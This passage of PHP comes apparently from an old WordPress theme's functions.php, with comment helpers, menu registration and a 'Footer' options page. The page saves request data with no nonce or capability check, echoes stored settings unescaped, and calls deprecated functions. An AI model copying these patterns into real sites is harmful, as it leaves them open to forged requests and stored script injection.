	function get_next_comments_link($label)
	{
		ob_start();
		next_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_posts_link')) {
	function get_previous_posts_link($label)
	{
		ob_start();
		previous_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_posts_link')) {
	function get_next_posts_link($label)
	{
		ob_start();
		next_posts_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_previous_post_link')) {
	function get_previous_post_link($label)
	{
		ob_start();
		previous_post_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_post_link')) {
	function get_next_post_link($label)
	{
		ob_start();
		next_post_link($label);
		return ob_get_clean();
	}
}

function art_get_comment_author_link(){
    ob_start();
    comment_author_link();    
    return ob_get_clean();
}

function art_get_edit_comment_link(){
    ob_start();
    edit_comment_link('('.__('Редактировать', THEME_NS).')','  ','');
    return  ob_get_clean();
}

function art_get_comment_text(){
    ob_start();
    comment_text();
    return  ob_get_clean();
}

function art_get_comment_reply_link($args, $depth){
    ob_start();
    comment_reply_link(array_merge( $args, array('depth' => $depth, 'max_depth' => $args['max_depth'])));
    return  ob_get_clean();
}


function art_comment($comment, $args, $depth)
{
	 $GLOBALS['comment'] = $comment; ?>
    <li <?php comment_class(); ?> id="li-comment-<?php comment_ID() ?>">
     <div id="comment-<?php comment_ID(); ?>">
<?php  art_post_box('',  art_parse_template("comment", array(
		'get_avatar'          =>   get_avatar($comment, $size='48'),
		'comment_author_link' =>   art_get_comment_author_link(),
		'status'              =>   $comment->comment_approved == '0' ?  '<em>' . __('Ваш комментарий ожидает модерации.', THEME_NS) . '</em><br />' : '',
		'get_comment_link'    =>   htmlspecialchars( get_comment_link( $comment->comment_ID ) ) ,
		'get_comment_date'    =>   sprintf(__('%1$s at %2$s', THEME_NS), get_comment_date(),  get_comment_time()),
		'edit_comment_link'   =>   art_get_edit_comment_link(),
		'comment_text'        =>   art_get_comment_text(),
		'comment_reply_link'  =>   art_get_comment_reply_link($args, $depth)))); ?>      
     </div>
<?php
}

add_filter('comments_template', 'legacy_comments');  
function legacy_comments($file) {  
    if(!function_exists('wp_list_comments')) : // WP 2.7-only check  
    $file = TEMPLATEPATH.'/legacy-comments.php';  
    endif;  
    return $file;  
} 

if ( function_exists('add_theme_support') ) {
	add_theme_support('post-thumbnails');
  add_theme_support('nav-menus');
  add_theme_support('automatic-feed-links');
}

if (function_exists('register_nav_menus')) {
    register_nav_menus(
		array(
			'primary-menu'   =>   __( 'Primary Menu', THEME_NS),
			'secondary-menu' =>   __( 'Secondary Menu', THEME_NS)
		)
	);
}
 

function art_add_admin() {
	global $options;
  if ( $_GET['page'] == basename(__FILE__) ) {
    if ('save' == $_REQUEST['action'] ) {
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            art_update_option( $value['id'], $_REQUEST[ $value['id'] ] );
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              art_update_option($up_opt, $_REQUEST[$up_opt] );
            }
          }
      }
      foreach ($options as $value) {
          if($value['type'] != 'multicheck'){
            if( isset( $_REQUEST[ $value['id'] ] ) ) { art_update_option( $value['id'], $_REQUEST[ $value['id'] ]  ); } else { delete_option( $value['id'] ); }
          }else{
            foreach($value['options'] as $mc_key => $mc_value){
              $up_opt = $value['id'].'_'.$mc_key;
              if( isset( $_REQUEST[ $up_opt ] ) ) { art_update_option( $up_opt, $_REQUEST[ $up_opt ]  ); } else { delete_option( $up_opt ); }
            }
          }
      }
      header("Location: themes.php?page=functions.php&saved=true");
      die;
    } 
  }
  add_theme_page("Footer", "Footer", 'edit_themes', basename(__FILE__), 'art_admin');
}
add_action('admin_menu', 'art_add_admin');

     
	
function art_update_option($key, $value){
	update_option($key, (get_magic_quotes_gpc()) ? stripslashes($value) : $value);
}


function art_admin() {
    global $options;
    if ( $_REQUEST['saved'] ) echo '<div id="message" class="updated fade"><p><strong>'.art_option('theme.name') . ' settings saved.</strong></p></div>';
?>
<div class="wrap">
	<h2>Footer</h2>

	<form method="post">

		<table class="optiontable" style="width:100%;">

<?php foreach ($options as $value) {
   
    switch ( $value['type'] ) {
        case 'text':
        option_wrapper_header($value);
        ?>
                <input style="width:100%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" type="<?php echo $value['type']; ?>" value="<?php if ( get_settings( $value['id'] ) != "") { echo get_settings( $value['id'] ); } else { echo $value['std']; } ?>" />
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'select':
        option_wrapper_header($value);
        ?>
                <select style="width:70%;" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>">
                    <?php foreach ($value['options'] as $option) { ?>
                    <option<?php if ( get_settings( $value['id'] ) == $option) { echo ' selected="selected"'; } elseif ($option == $value['std']) { echo ' selected="selected"'; } ?>><?php echo $option; ?></option>
                    <?php } ?>
                </select>
        <?php
        option_wrapper_footer($value);
        break;
       
        case 'textarea':
        $ta_options = $value['options'];
        option_wrapper_header($value);
        ?>
                <textarea name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" style="width:100%;height:100px;"><?php
                if( get_settings($value['id']) !== false) {
                        echo stripslashes(get_settings($value['id']));
                    }else{
                        echo $value['std'];
                }?></textarea>
        <?php
        option_wrapper_footer($value);
        break;

        case "radio":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                $radio_setting = get_settings($value['id']);
                if($radio_setting != ''){
                    if ($key == get_settings($value['id']) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="radio" name="<?php echo $value['id']; ?>" value="<?php echo $key; ?>" <?php echo $checked; ?> /><?php echo $option; ?><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "checkbox":
        option_wrapper_header($value);
                        if(get_settings($value['id'])){
                            $checked = "checked=\"checked\"";
                        }else{
                            $checked = "";
                        }
                    ?>
                    <input type="checkbox" name="<?php echo $value['id']; ?>" id="<?php echo $value['id']; ?>" value="true" <?php echo $checked; ?> />
        <?php
        option_wrapper_footer($value);
        break;

        case "multicheck":
        option_wrapper_header($value);
       
        foreach ($value['options'] as $key=>$option) {
                 $pn_key = $value['id'] . '_' . $key;
                $checkbox_setting = get_settings($pn_key);
                if($checkbox_setting != ''){
                    if (get_settings($pn_key) ) {
                        $checked = "checked=\"checked\"";
                        } else {
                            $checked = "";
                        }
                }else{
                    if($key == $value['std']){
                        $checked = "checked=\"checked\"";
                    }else{
                        $checked = "";
                    }
                }?>
                <input type="checkbox" name="<?php echo $pn_key; ?>" id="<?php echo $pn_key; ?>" value="true" <?php echo $checked; ?> /><label for="<?php echo $pn_key; ?>"><?php echo $option; ?></label><br />
        <?php
        }
        
        option_wrapper_footer($value);
        break;
       
        case "heading":
        ?>
        <tr valign="top">
            <td colspan="2" style="text-align: center;"><h3><?php echo $value['name']; ?></h3></td>
        </tr>
        <?php
        break;
       
        default:

        break;
    }
}
?>

		</table>

		<p class="submit">
			<input name="save" type="submit" value="Сохранить" />
			<input type="hidden" name="action" value="save" />
		</p>
	</form>
</div>
<?php
}

function option_wrapper_header($values){
    ?>
    <tr valign="top">
        <th scope="row" style="width:1%;white-space: nowrap;"><?php echo $values['name']; ?>:</th>
        <td>
    <?php
}

function option_wrapper_footer($values){
    ?>
        </td>
    </tr>
    <tr valign="top">
        <td>&nbsp;</td><td><small><?php echo $values['desc']; ?></small></td>
    </tr>
    <?php
}
